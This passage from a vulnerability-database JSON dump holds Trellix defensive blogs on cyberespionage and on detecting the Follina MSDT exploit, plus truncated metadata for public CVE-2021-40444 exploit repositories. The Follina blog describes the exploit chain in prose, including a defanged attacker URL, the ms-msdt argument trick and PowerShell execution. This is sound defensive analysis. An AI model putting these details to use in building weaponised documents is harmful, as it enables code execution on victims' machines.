information leaving organizational perimeter. This includes getting visibility into endpoint processes accessing sensitive/tagged data.\n\n**Bringing Visibility into the SOC with XDR:** Detecting multi-vector telemetry requires context and correlation across multiple data sources so that the right alerts and telemetry is presented to the SOC analyst for effective triage, scoping of the threat and effective incident response.\n\n Figure 10: Example XDR Correlation with multi-vector sensor telemetry from Threat Intelligence, Endpoint, DLP \n\n\n**Integrated sandbox for malware analysis:** As part of the Trellix solution architecture, the endpoints are capable of sending files dynamically or through integrated SOAR workflows to the Trellix Detection on Demand Cloud Sandbox. A quick analysis of the XLSX document reveals that pseudo data was used entice the end user into opening the document.\n\n Figure 11: Trellix DOD Analysis \n\n\n## Summary\n\nDefeating a multi-stage cyberespionage campaign requires a multipronged defensive strategy that starts by building an effective threat model leading to prioritization and deployment of highest impact preventive controls which leads to a security model that stalls the attackers progress and delivering enterprise resilience to cyberespionage campaigns. Some of the key steps in building such resilience is as follows:\n\n Figure 12: Cyber Espionage Playbook \n\n\nFor additional details and understanding, you can view our Threat Center webinar with Trellix Solution Architects explaining how we defend against this attack [here](<https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6305609522112&eid=P5SWSAQK>).\n", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-20T00:00:00", "id": "TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/defending-against-cyber-espionage-campaigns-operation-graphite.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol **ms-msdt:/** could also be invoked from the malicious word document, which when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability, was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features , improving product\u2019s overall Threat Detection capabilities.\n\nOver the next few sections of this blog, we will highlight couple of advanced detection features in Trellix NSP, which helps in protecting the customers against this and future attacks of similar nature.\n\n## Introduction \n\nMS Word document exploiting Microsoft Support Diagnostic Tool vulnerability ( CVE- 2022-30190 ) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. However, the number 0438 turns out to be the Area code of the region **Follina** in Italy and hence the name. Exploit document is not found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of the MS Office\u2019s core features, Object Linking and Embedding ( OLE ) have been abused as an initial attack vector and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding had significantly contributed to building weaponized office exploits, and we believe this will continue to happen. As with previous CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to the externally hosted object, in this case, html file. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) mentions that an Office Open XML document facilitates embedding objects or link to external objects which can be specified via relationships. Any embedded or linked object specified in the container application ( OOXML document in this case ) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type and the application used to load the object data. An excerpt from the document specifications is as shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>) ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded and the **ProgID=\u201dhtmlfile\u201d** indicates the type of linked object data. As shown in the CVE-2022-30190 exploit document below, **document.xml.rels** file with Type attribute specifying relationship as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted potentially malicious object and invoke the respective protocol handlers for rendering the object which could lead to the exploitation of potential logic flaws in object renderers.\n\n Figure 3: Structure of exploit document \n\n\nAs we notice the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the html file :\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. Hosted html file on this domain contains script block with commented lines. This is required for making the HTML file sufficiently sized ( precisely greater than 4KB ) to be able to get it processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, script tries to invoke PCWDiagnostic package using MSDT URI protocol handler with multiple arguments out of which one argument is IT_BrowseForFile which can take embedded PowerShell script within $( ) as an argument , resulting into code execution. PowerShell script is Base64 encoded and decoded form is of the script is as shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * Malicious MS office document with linked object is delivered to the victim possibly, as a part of phishing campaign.\n * On clicking the document, malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows system registers innumerable number of URI protocol handlers which could be potentially abused to exploit similar flaws. For instance, [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler , used to query windows search indexing feature can be abused by the attackers to connect to the remote SMB share on the attacker-controlled server. However, it does not directly lead to code execution as it requires multiple levels of user interaction, but a query can be crafted to lure the users to execute legitimate looking executables as shown below. Both these of URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advance and mature IPS in the security industry. Over a period, we developed some of the cutting-edge features to deal with complex attack scenarios which involved handling encoding, compressions, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** being some of these. We use combination of these advance capabilities to detect entire attack cycle. In the following sections, we will try to understand how Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising overall confidence level.\n\n**Microsoft Open Office XML(OOXML) file format**\n\nOLE File format which was traditionally used in Microsoft office is replaced with Office open xml. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell this means that the whole document is contained in a zip package. Multiple files and directories together form the document. There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. \n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. \n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nThe attack visualization is better when the dots can be connected between different stages of the attack. Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400) \u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate corelated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins to take further actions. This feature is built into Trellix NSP by default and there is no extra configuration required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes like \u2013 \n * source-IP/destination IP: This attribute helps correlating attack originating from same source IP and/or targeted to the same destination IP .\n * Lifetime: max time interval in which all correlation signature event should occur\n * Threshold: Detection of attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities for the complete attack cycle, Trellix Network Security Platform\u2019s Threat Detection solution balances the effectiveness and performance extremely well. The Trellix NSP research and Engineering team actively monitors and keeps an eye on emerging threat patterns ,builds the features and capabilities to enhance overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future and the **Follina** attack very well validates our prediction. While exploiting different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations as either operating system or hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing the innovative inspection and detection techniques alongside applying secure software design and development practices during application development. \n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": 